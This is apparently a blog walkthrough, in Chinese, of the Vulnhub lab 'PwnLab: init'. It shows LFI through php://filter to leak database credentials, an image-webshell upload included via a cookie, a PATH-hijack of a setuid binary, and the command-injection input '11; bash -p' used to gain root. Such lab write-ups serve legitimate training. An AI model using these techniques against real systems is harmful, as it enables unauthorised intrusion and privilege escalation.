guayu-kakeru
0%

Vulnhub-Pwnlab:init

发表于 更新于 分类于

依然是cisp举得例子

靶机介绍
Wellcome to “PwnLab: init”, my first Boot2Root virtual machine. Meant to be easy, I hope you enjoy it and maybe learn something. The purpose of this CTF is to get root and read de flag.

Can contact me at: claor@pwnlab.net or on Twitter: @Chronicoder

Difficulty: Low
Flag: /root/flag.txt

端口扫描

1
2
3
4
5
6
7
8
9
10
11
12
13
┌──(root㉿kali)-[~/tmp]
└─# nmap 192.168.1.11
Starting Nmap 7.95 ( https://nmap.org ) at 2025-08-19 10:48 CST
Nmap scan report for anonymous (192.168.1.11)
Host is up (0.00071s latency).
Not shown: 997 closed tcp ports (reset)
PORT     STATE SERVICE
80/tcp   open  http
111/tcp  open  rpcbind
3306/tcp open  mysql
MAC Address: 00:0C:29:F0:7D:9E (VMware)

Nmap done: 1 IP address (1 host up) scanned in 1.28 seconds

web

进入web之后有一个文件上传的界面,但是要先登录

先用bp爆破一下密码 –> 没有爆破出来
首页就这些内容了,现在扫一下目录

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
┌──(root㉿kali)-[~/tmp]
└─# dirsearch -u 192.168.1.11
/usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
  from pkg_resources import DistributionNotFound, VersionConflict

  _|. _ _  _  _  _ _|_    v0.4.3
 (_||| _) (/_(_|| (_| )

Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11460

Output File: /root/tmp/reports/_192.168.1.11/_25-08-19_16-31-41.txt

Target: http://192.168.1.11/

[16:31:41] Starting:
[16:31:51] 403 -  298B  - /.ht_wsr.txt
[16:31:52] 403 -  301B  - /.htaccess.bak1
[16:31:52] 403 -  303B  - /.htaccess.sample
[16:31:52] 403 -  301B  - /.htaccess.save
[16:31:52] 403 -  301B  - /.htaccess.orig
[16:31:52] 403 -  299B  - /.htaccess_sc
[16:31:52] 403 -  301B  - /.htaccess_orig
[16:31:52] 403 -  302B  - /.htaccess_extra
[16:31:52] 403 -  300B  - /.htaccessOLD2
[16:31:52] 403 -  299B  - /.htaccessOLD
[16:31:52] 403 -  299B  - /.htaccessBAK
[16:31:52] 403 -  292B  - /.html
[16:31:52] 403 -  291B  - /.htm
[16:31:52] 403 -  301B  - /.htpasswd_test
[16:31:52] 403 -  297B  - /.htpasswds
[16:31:52] 403 -  298B  - /.httr-oauth
[16:31:58] 403 -  291B  - /.php
[16:31:58] 403 -  292B  - /.php3
[16:33:07] 200 -    0B  - /config.php
[16:33:38] 200 -  455B  - /images/
[16:33:38] 301 -  313B  - /images  ->  http://192.168.1.11/images/
[16:33:51] 200 -  164B  - /login.php
[16:34:34] 403 -  300B  - /server-status
[16:34:34] 403 -  301B  - /server-status/
[16:34:58] 301 -  313B  - /upload  ->  http://192.168.1.11/upload/
[16:34:58] 200 -   19B  - /upload.php
[16:34:58] 200 -  404B  - /upload/

这里有一个配置文件config.php 但是无法直接访问,upload.php就是首页中的,要先登录
现在就看能不能读到config.php
注意到登录界面的urlhttp://192.168.1.11/?page=login 这个参数很可能存在lfi
直接用file协议没有结果 然后用php伪协议用base64加密读取,直接用http://192.168.1.11/?page=php://filter/read=convert.base64-encode/resource=config.php也读不到,结合一开始是page是login 目录扫描到的是login.php
所以可能是自动添加了后缀。 所以直接读config

1
2
3
4
5
6
7
8
┌──(root㉿kali)-[~/tmp]
└─# echo "PD9waHANCiRzZXJ2ZXIJICA9ICJsb2NhbGhvc3QiOw0KJHVzZXJuYW1lID0gInJvb3QiOw0KJHBhc3N3b3JkID0gIkg0dSVRSl9IOTkiOw0KJGRhdGFiYXNlID0gIlVzZXJzIjsNCj8+" | base64 -d
<?php
$server   = "localhost";
$username = "root";
$password = "H4u%QJ_H99";
$database = "Users";
?>

得到了数据库的用户名和密码以及数据库
进入数据库得到账号密码

1
2
3
4
5
6
7
8
9
10
11
MySQL [Users]> select * from users;
+------+------------------+
| user | pass             |
+------+------------------+
| kent | Sld6WHVCSkpOeQ== |
| mike | U0lmZHNURW42SQ== |
| kane | aVN2NVltMkdSbw== |
+------+------------------+
3 rows in set (0.012 sec)

MySQL [Users]>

实际的密码需要用base64解码后的明文登录

随便登录一个用户,准备上传一个webshell
用lfi漏洞查看upload.php的源码 发现有后缀白名单检查 MIME检查 getimagesize 检查
现在上传一个图片马

然后在upload中可以看到文件上传之后的路径

upload/274a01ad7ad7ad7d73d5f0b399ae5db2.gif
现在就是解决如何把这个gif文件解析成php
继续用php伪协议读取首页代码,发现有一个文件包含漏洞,可以利用这个解析刚刚上传的gif文件成php

这里是用COOKIE中的lang这个参数传入要解析的文件,但是要注意前面拼接了lang
所以在cookie中添加 lang=../upload/[文件名]
访问首页就看到被成功包含了

antsword连接之后打开虚拟终端 反弹shell

提权

拿到www权限之后 在home目录下发现几个用户,继续用刚才在网页上登录的用户账号密码切换kent用户

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
www-data@pwnlab:/var$ cd /home
cd /home
www-data@pwnlab:/home$ ls
ls
john  kane  kent  mike
www-data@pwnlab:/home$ su - kent
su - kent
Password: JWzXuBJJNy

kent@pwnlab:~$ ls
ls
kent@pwnlab:~$ cd
cd
kent@pwnlab:~$ ls
ls
kent@pwnlab:~$ cd /home
cd /home
kent@pwnlab:/home$ ls
ls
john  kane  kent  mike
kent@pwnlab:/home$ cd kent
cd kent
kent@pwnlab:~$ ls
ls
kent@pwnlab:~$ ls -al
ls -al
total 20
drwxr-x--- 2 kent kent 4096 Mar 17  2016 .
drwxr-xr-x 6 root root 4096 Mar 17  2016 ..
-rw-r--r-- 1 kent kent  220 Mar 17  2016 .bash_logout
-rw-r--r-- 1 kent kent 3515 Mar 17  2016 .bashrc
-rw-r--r-- 1 kent kent  675 Mar 17  2016 .profile
kent@pwnlab:~$ sudo -l
sudo -l
-su: sudo: command not found
kent@pwnlab:~$

但是什么都没有 也没有sudo
再尝试另外两个用户 发现kane可以登录 并且目录下面有一个可执行文件

1
2
3
4
5
6
7
8
9
10
11
12
kane@pwnlab:~$ ls -al
ls -al
total 28
drwxr-x--- 2 kane kane 4096 Mar 17  2016 .
drwxr-xr-x 6 root root 4096 Mar 17  2016 ..
-rw-r--r-- 1 kane kane  220 Mar 17  2016 .bash_logout
-rw-r--r-- 1 kane kane 3515 Mar 17  2016 .bashrc
-rwsr-sr-x 1 mike mike 5148 Mar 17  2016 msgmike
-rw-r--r-- 1 kane kane  675 Mar 17  2016 .profile
kane@pwnlab:~$ file msgmike
file msgmike
msgmike: setuid, setgid ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked, interpreter /lib/ld-linux.so.2, for GNU/Linux 2.6.32, BuildID[sha1]=d7e0b21f33b2134bd17467c3bb9be37deb88b365, not stripped

执行之后发现会执行一个cat命令 

1
2
3
kane@pwnlab:~$ ./msgmike
./msgmike
cat: /home/mike/msg.txt: No such file or directory

既然这个文件属于mike 那就可以利用这个程序来提权到mike 方式就是劫持环境变量 让cat调用我们自创的cat

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
kane@pwnlab:~$ echo "/bin/bash" > cat
echo "/bin/bash" > cat
kane@pwnlab:~$ chmod 777 cat
chmod 777 cat
kane@pwnlab:~$ ls
ls
cat  msgmike
kane@pwnlab:~$ ls -al
ls -al
total 32
drwxr-x--- 2 kane kane 4096 Aug 19 22:45 .
drwxr-xr-x 6 root root 4096 Mar 17  2016 ..
-rw-r--r-- 1 kane kane  220 Mar 17  2016 .bash_logout
-rw-r--r-- 1 kane kane 3515 Mar 17  2016 .bashrc
-rwxrwxrwx 1 kane kane   10 Aug 19 22:45 cat
-rwsr-sr-x 1 mike mike 5148 Mar 17  2016 msgmike
-rw-r--r-- 1 kane kane  675 Mar 17  2016 .profile
kane@pwnlab:~$ export PATH=./:$PATH
export PATH=./:$PATH
kane@pwnlab:~$ ./msgmike
./msgmike
mike@pwnlab:~$ id
id
uid=1002(mike) gid=1002(mike) groups=1002(mike),1003(kane)

在mike目录下又发现一个属于root的可执行文件

1
2
3
4
5
6
7
8
9
10
11
12
mike@pwnlab:/home/mike$ ls -al
ls -al
total 28
drwxr-x--- 2 mike mike 4096 Mar 17  2016 .
drwxr-xr-x 6 root root 4096 Mar 17  2016 ..
-rw-r--r-- 1 mike mike  220 Mar 17  2016 .bash_logout
-rw-r--r-- 1 mike mike 3515 Mar 17  2016 .bashrc
-rwsr-sr-x 1 root root 5364 Mar 17  2016 msg2root
-rw-r--r-- 1 mike mike  675 Mar 17  2016 .profile
mike@pwnlab:/home/mike$ file msg2root
file msg2root
msg2root: setuid, setgid ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked, interpreter /lib/ld-linux.so.2, for GNU/Linux 2.6.32, BuildID[sha1]=60bf769f8fbbfd406c047f698b55d2668fae14d3, not stripped

用string查看
发现执行了/bin/echo %s >> /root/messages.txt命令

那就可以在发送消息后面用; 截断后面执行我们想要的命令 这里可以用bash -p特权模式 让当前shell有root的权限

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
mike@pwnlab:/home/mike$ ./msg2root
./msg2root
Message for root: 1;ls
1;ls
1
msg2root
mike@pwnlab:/home/mike$ ./msg2root
./msg2root
Message for root: 11; bash -p
11; bash -p
11
bash-4.3# id
id
uid=1002(mike) gid=1002(mike) euid=0(root) egid=0(root) groups=0(root),1003(kane)
bash-4.3# su - root
su - root
Password:

su: Authentication failure
bash-4.3# cd /root
cd /root
bash-4.3# ls
ls
flag.txt  messages.txt
bash-4.3# cat flag.txt
cat flag.txt
.-=~=-.                                                                 .-=~=-.
(__  _)-._.-=-._.-=-._.-=-._.-=-._.-=-._.-=-._.-=-._.-=-._.-=-._.-=-._.-(__  _)
(_ ___)  _____                             _                            (_ ___)
(__  _) /  __ \                           | |                           (__  _)
( _ __) | /  \/ ___  _ __   __ _ _ __ __ _| |_ ___                      ( _ __)
(__  _) | |    / _ \| '_ \ / _` | '__/ _` | __/ __|                     (__  _)
(_ ___) | \__/\ (_) | | | | (_| | | | (_| | |_\__ \                     (_ ___)
(__  _)  \____/\___/|_| |_|\__, |_|  \__,_|\__|___/                     (__  _)
( _ __)                     __/ |                                       ( _ __)
(__  _)                    |___/                                        (__  _)
(__  _)                                                                 (__  _)
(_ ___) If  you are  reading this,  means  that you have  break 'init'  (_ ___)
( _ __) Pwnlab.  I hope  you enjoyed  and thanks  for  your time doing  ( _ __)
(__  _) this challenge.                                                 (__  _)
(_ ___)                                                                 (_ ___)
( _ __) Please send me  your  feedback or your  writeup,  I will  love  ( _ __)
(__  _) reading it                                                      (__  _)
(__  _)                                                                 (__  _)
(__  _)                                             For sniferl4bs.com  (__  _)
( _ __)                                claor@PwnLab.net - @Chronicoder  ( _ __)
(__  _)                                                                 (__  _)
(_ ___)-._.-=-._.-=-._.-=-._.-=-._.-=-._.-=-._.-=-._.-=-._.-=-._.-=-._.-(_ ___)
`-._.-'                                                                 `-._.-'

完成

总结

  • 发现config文件 尝试用php伪协议读取文件内容
  • 数据库密码的复用 可以登录用户
  • 图片马 找文件包含 首页源码有lang的cookie值传参包含
  • 提权考察都是可执行文件中的劫持 一个是环境变量劫持 一个是命令注入
  • 学习以后在有文件读取的时候不要放过首页等,可能包含其他信息。